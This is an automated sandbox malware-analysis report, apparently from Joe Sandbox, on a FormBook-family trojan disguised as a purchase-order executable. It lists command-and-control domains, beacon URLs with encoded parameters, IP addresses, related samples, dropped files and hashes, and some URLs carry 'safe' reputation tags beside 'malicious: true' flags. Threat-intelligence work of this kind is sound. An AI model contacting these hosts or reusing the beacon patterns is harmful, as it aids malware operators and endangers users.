            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.bola88site.one/3lkx/0%Avira URL Cloudsafe
            http://www.groet.online/kdsf/0%Avira URL Cloudsafe
            http://www.mfgamecompany.shop/lwt6/0%Avira URL Cloudsafe
            http://www.mizuquan.top/ed2j/?bX=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&RFRd_=tFLD0%Avira URL Cloudsafe
            http://www.hm62t.top/p39s/0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz/k2vl/0%Avira URL Cloudsafe
            http://www.quilo.life/ftr3/0%Avira URL Cloudsafe
            http://www.kckartal.xyz/h5qr/0%Avira URL Cloudsafe
            http://www.070001350.xyz0%Avira URL Cloudsafe
            http://www.qiluqiyuan.buzz/wjff/?bX=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&RFRd_=tFLD0%Avira URL Cloudsafe
            http://www.070001350.xyz/ivyl/0%Avira URL Cloudsafe
            http://www.mizuquan.top/ed2j/0%Avira URL Cloudsafe
            http://www.kckartal.xyz/h5qr/?bX=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&RFRd_=tFLD0%Avira URL Cloudsafe
            http://www.726075.buzz/w9nd/0%Avira URL Cloudsafe
            http://www.capbear.net/ijno/0%Avira URL Cloudsafe
            http://www.hm62t.top/p39s/?RFRd_=tFLD&bX=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==0%Avira URL Cloudsafe
            http://www.freepicture.online/xcfw/0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz/k2vl/?bX=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&RFRd_=tFLD0%Avira URL Cloudsafe
            http://www.freepicture.online/xcfw/?bX=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&RFRd_=tFLD0%Avira URL Cloudsafe
            http://www.mfgamecompany.shop/lwt6/?bX=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==&RFRd_=tFLD0%Avira URL Cloudsafe
            http://www.groet.online/kdsf/?bX=mrPbX6f2ANh6eH6BaYBcOaExirfKelxT8B/s11FteNVWpCBC/Ng1kYBANMlCHLb8Vm1KElmPNEHDJkuYfrXhfpk22msKwfJUhUP/5Z9IMLZY9GQtDtvdXiZeiMyh2YwcFA==&RFRd_=tFLD0%Avira URL Cloudsafe
            http://www.quilo.life/ftr3/?bX=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&RFRd_=tFLD0%Avira URL Cloudsafe
            http://www.qiluqiyuan.buzz/wjff/0%Avira URL Cloudsafe
            https://www.mfgamecompany.shop/lwt6/?bX=j/d5AuZ0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.capbear.net/ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy0%Avira URL Cloudsafe
            https://www.drupal.org)0%Avira URL Cloudsafe
            http://www.070001350.xyz/ivyl/?bX=R3Qz1Cq/YEXK51DnfrEfG6FZDYGRURJsK8S8Pa4nsScgDMDttNnynOTz2BK+/4aKVNhzLsJ6XObNN2Y75FAxAaoazEpO0rybbGrvB+WgGgze1Cytk6YUwSk/iMHlseUc1g==&RFRd_=tFLD0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.quilo.life
            		203.161.43.228
            		truetrue
              		unknown
              bola88site.one
              		172.96.191.39
              		truetrueunknown
              freepicture.online
              		89.58.49.1
              		truetrueunknown
              070001350.xyz
              		65.21.196.90
              		truetrueunknown
              natroredirect.natrocdn.com
              		85.159.66.93
              		truetrueunknown
              www.groet.online
              		185.104.29.12
              		truetrueunknown
              www.capbear.net
              		104.207.148.137
              		truetrueunknown
              hm62t.top
              		154.23.184.240
              		truetrueunknown
              www.kckartal.xyz
              		104.21.20.125
              		truetrue
                		unknown
                www.mizuquan.top
                		43.242.202.169
                		truetrue
                  		unknown
                  mfgamecompany.shop
                  		185.173.111.76
                  		truetrue
                    		unknown
                    www.726075.buzz
                    		47.57.185.227
                    		truetrueunknown
                    www.qiluqiyuan.buzz
                    		161.97.168.245
                    		truetrueunknown
                    www.golbasi-nakliyat.xyz
                    		unknown
                    		unknowntrueunknown
                    www.freepicture.online
                    		unknown
                    		unknowntrueunknown
                    www.monos.shop
                    		unknown
                    		unknowntrueunknown
                    www.hm62t.top
                    		unknown
                    		unknowntrue
                      		unknown
                      www.mfgamecompany.shop
                      		unknown
                      		unknowntrueunknown
                      www.070001350.xyz
                      		unknown
                      		unknowntrue
                        		unknown
                        www.bola88site.one
                        		unknown
                        		unknowntrue
                          		unknown
                          www.318st.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.kxshopmr.store
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.qiluqiyuan.buzz/wjff/?bX=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bola88site.one/3lkx/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mfgamecompany.shop/lwt6/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.golbasi-nakliyat.xyz/k2vl/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mizuquan.top/ed2j/?bX=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.kckartal.xyz/h5qr/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.quilo.life/ftr3/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.groet.online/kdsf/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.hm62t.top/p39s/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mizuquan.top/ed2j/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.kckartal.xyz/h5qr/?bX=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.capbear.net/ijno/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.070001350.xyz/ivyl/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.golbasi-nakliyat.xyz/k2vl/?bX=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.freepicture.online/xcfw/?bX=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.726075.buzz/w9nd/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.hm62t.top/p39s/?RFRd_=tFLD&bX=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mfgamecompany.shop/lwt6/?bX=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.freepicture.online/xcfw/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.quilo.life/ftr3/?bX=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.groet.online/kdsf/?bX=mrPbX6f2ANh6eH6BaYBcOaExirfKelxT8B/s11FteNVWpCBC/Ng1kYBANMlCHLb8Vm1KElmPNEHDJkuYfrXhfpk22msKwfJUhUP/5Z9IMLZY9GQtDtvdXiZeiMyh2YwcFA==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.qiluqiyuan.buzz/wjff/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.070001350.xyz/ivyl/?bX=R3Qz1Cq/YEXK51DnfrEfG6FZDYGRURJsK8S8Pa4nsScgDMDttNnynOTz2BK+/4aKVNhzLsJ6XObNN2Y75FAxAaoazEpO0rybbGrvB+WgGgze1Cytk6YUwSk/iMHlseUc1g==&RFRd_=tFLDtrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabRMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.ecosia.org/newtab/RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.070001350.xyzWwOlfblnYaWmLq.exe, 00000006.00000002.4511569074.00000000053E6000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ac.ecosia.org/autocomplete?q=RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.mfgamecompany.shop/lwt6/?bX=j/d5AuZRMActivate_ssp.exe, 00000005.00000002.4510222204.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000003C80000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssRMActivate_ssp.exe, 00000005.00000002.4510222204.0000000004342000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000003E12000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.capbear.net/ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dyRMActivate_ssp.exe, 00000005.00000002.4510222204.0000000004CAE000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.000000000477E000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.drupal.org)WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000004910000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              65.21.196.90
                              		070001350.xyzUnited States
                              		199592CP-ASDEtrue
                              185.104.29.12
                              		www.groet.onlineNetherlands
                              		206281AS-ZXCSNLtrue
                              47.57.185.227
                              		www.726075.buzzUnited States
                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                              85.159.66.93
                              		natroredirect.natrocdn.comTurkey
                              		34619CIZGITRtrue
                              203.161.43.228
                              		www.quilo.lifeMalaysia
                              		45899VNPT-AS-VNVNPTCorpVNtrue
                              172.96.191.39
                              		bola88site.oneCanada
                              		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                              104.21.20.125
                              		www.kckartal.xyzUnited States
                              		13335CLOUDFLARENETUStrue
                              89.58.49.1
                              		freepicture.onlineGermany
                              		5430FREENETDEfreenetDatenkommunikationsGmbHDEtrue
                              154.23.184.240
                              		hm62t.topUnited States
                              		174COGENT-174UStrue
                              185.173.111.76
                              		mfgamecompany.shopGermany
                              		42366TERRATRANSIT-ASDEtrue
                              43.242.202.169
                              		www.mizuquan.topHong Kong
                              		40065CNSERVERSUStrue
                              104.207.148.137
                              		www.capbear.netUnited States
                              		20473AS-CHOOPAUStrue
                              161.97.168.245
                              		www.qiluqiyuan.buzzUnited States
                              		51167CONTABODEtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1511724
                              Start date and time:2024-09-16 09:28:09 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 10m 39s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:PO2-2401-0016 (TR).exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/2@18/13
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 43
                              • Number of non-executed functions: 297
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target WwOlfblnYaWmLq.exe, PID 2612 because it is empty
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              03:30:00API Interceptor12179192x Sleep call for process: RMActivate_ssp.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              65.21.196.90FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                              • www.030003112.xyz/dk22/
                              Purchase order.exeGet hashmaliciousFormBookBrowse
                              • www.070001350.xyz/zvc6/
                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                              • www.030002304.xyz/tmpg/
                              Remittance advice.exeGet hashmaliciousFormBookBrowse
                              • www.070001350.xyz/zvc6/
                              doc330391202408011.exeGet hashmaliciousFormBookBrowse
                              • www.030002060.xyz/oap7/
                              DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                              • www.030002721.xyz/i28e/
                              yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                              • www.030002060.xyz/d629/?EN-hu=KAaEqqZfS4cDvU3Ij6Gom2nrmNT9tw2tnUHZxD+rCxnnN6LgNdSAGbreu7nZG1S4n6xTi0fmbnaWzdqJKm8Z7U+GaCKh7LK1IRPJE/WiiU/xJvV0/w==&zx=TzUh
                              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                              • www.070001294.xyz/ohwx/
                              REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                              • www.030002060.xyz/oap7/
                              REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                              • www.030002060.xyz/oap7/
                              185.104.29.12k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                              • www.groet.online/l4nl/
                              PO#4510065525.exeGet hashmaliciousFormBookBrowse
                              • www.groet.online/kdsf/
                              47.57.185.227AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                              • www.726075.buzz/w9nd/
                              PO#4510065525.exeGet hashmaliciousFormBookBrowse
                              • www.726075.buzz/w9nd/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              www.quilo.lifePurchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                              • 203.161.43.228
                              Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                              • 203.161.43.228
                              PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                              • 203.161.43.228
                              Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                              • 203.161.43.228
                              PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                              • 203.161.43.228
                              AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                              • 203.161.43.228
                              PO#4510065525.exeGet hashmaliciousFormBookBrowse
                              • 203.161.43.228

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CP-ASDEfile.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                              • 65.21.18.51
                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                              • 65.21.196.90
                              Purchase order.exeGet hashmaliciousFormBookBrowse
                              • 65.21.196.90
                              file.exeGet hashmaliciousAmadey, Cryptbot, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                              • 65.21.18.51
                              information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                              • 65.21.99.150
                              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                              • 65.21.196.90
                              Remittance advice.exeGet hashmaliciousFormBookBrowse
                              • 65.21.196.90
                              VMRhiAFJtl.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer, RedLine, StealcBrowse
                              • 65.21.18.51
                              http:///ipscanadvsf.comGet hashmaliciousUnknownBrowse
                              • 65.21.119.50
                              XpCyBwDzEt.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLineBrowse
                              • 65.21.18.51
                              AS-ZXCSNLk8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                              • 185.104.29.12
                              rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                              • 185.104.28.238
                              4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                              • 185.104.28.238
                              PO#4510065525.exeGet hashmaliciousFormBookBrowse
                              • 185.104.29.12
                              DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                              • 185.104.28.238
                              DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                              • 185.104.28.238
                              NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 185.104.28.238
                              502407267 RUAG FOODPLAZA.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                              • 185.104.28.238
                              Att00173994.exeGet hashmaliciousFormBookBrowse
                              • 185.104.28.238
                              DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                              • 185.104.28.238
                              CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttp://www.goo.su/fJu2F/Get hashmaliciousUnknownBrowse
                              • 47.253.61.56
                              SecuriteInfo.com.Win32.Agent-BCJF.26841.1442.exeGet hashmaliciousUnknownBrowse
                              • 47.254.124.86
                              SecuriteInfo.com.Win32.Agent-BCJF.26841.1442.exeGet hashmaliciousUnknownBrowse
                              • 47.254.124.86
                              https://procoinbaselogin.iwopop.com/Get hashmaliciousUnknownBrowse
                              • 8.209.107.39
                              http://hjc.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                              • 47.253.61.56
                              https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/zoe-elefterin.com/M%2f13303%2FcXJzYy1xdWFsaXR5cmVwb3J0aW5nc2VydmljZWNlbnRlcmdyb3VwbWFpbGJveEBycmIuZ292Get hashmaliciousHTMLPhisherBrowse
                              • 47.253.61.56
                              http://vidaliaonion.orgGet hashmaliciousUnknownBrowse
                              • 47.253.61.56
                              SecuriteInfo.com.ELF.Agent-CPN.6229.9401.elfGet hashmaliciousUnknownBrowse
                              • 8.209.214.118
                              Play_VM-Now(Vincent.morrissey)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                              • 147.139.142.100
                              Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                              • 47.57.185.227

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\7466H3538

                              Download File
                              Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.121297215059106
                              Encrypted:false
                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                              MD5:D87270D0039ED3A5A72E7082EA71E305
                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\dews

                              Download File
                              Process:C:\Users\user\Desktop\PO2-2401-0016 (TR).exe
                              File Type:data
                              Category:dropped
                              Size (bytes):288768
                              Entropy (8bit):7.99583954381082
                              Encrypted:true
                              SSDEEP:6144:CQ5o4BoQpp74IpXEZlCSTrgzD7kXeGNYUFn1lQu8+B/e0s/ps:j5o4BoQpmgXEZlC4jNdHM0s/ps
                              MD5:45E87BABE76331CC825D9ADF918B4026
                              SHA1:F1CDBED846EFD2BA78F91B5902120F2EA1803CDF
                              SHA-256:C9EF17FBFDEF24A4985FF1986CAF8F7847239881EB55005B118266F8DE359E36
                              SHA-512:7E929D78968C5536A9BA35675D1687A9256A41D7F7180E8CBA56769EBF12E4F94231B17F6C9E8D37DD58F164020F4D6ADFB2AF914C41A13CCF6536360324A62D
                              Malicious:false
                              Reputation:low
                              Preview:.bw..RR84...G..~.0H..qY;...82E5RR84F7XNHHKAB00KDRAYZ3UOX8.E5R\'.H7.G.i.@....,;2y*A:(*Y_eV3<V[2.:+h:>/bY^k...y7\1*v5?O.RR84F7X7IA.|"W.v$5.d:T.U....U5."...d./.Q....+#..09[h/?.2E5RR84Fg.NH.J@B..0&RAYZ3UOX.2G4YS34Fa\NHHKAB00K.FAYZ#UOXH6E5R.84V7XNJHKGB00KDRA_Z3UOX82EEVR86F7XNHHIA..0KTRAIZ3UOH82U5RR84F'XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ.!* L2E5..<4F'XNH.OAB 0KDRAYZ3UOX82E.RRX4F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNHHKAB00KDRAYZ3UOX82E5RR84F7XNH

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.476251115962216
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:PO2-2401-0016 (TR).exe
                              File size:1'724'416 bytes
                              MD5:6f8e7d082d8c039064cbcc813d24dcb4
                              SHA1:2715db08498311cf04b28be93049916c6684685c
                              SHA256:392d1c5876d7d023d9d207fd1b5badce5939abad6b4796adb79a292aefb6f574
                              SHA512:5af8cf991138e57964490f8219b31a11c93ae26975cb45f87be04520285178ad587e957bf2fc582561a91e7d60437f0fade65a00904cf152c5ff6c5de86cab75
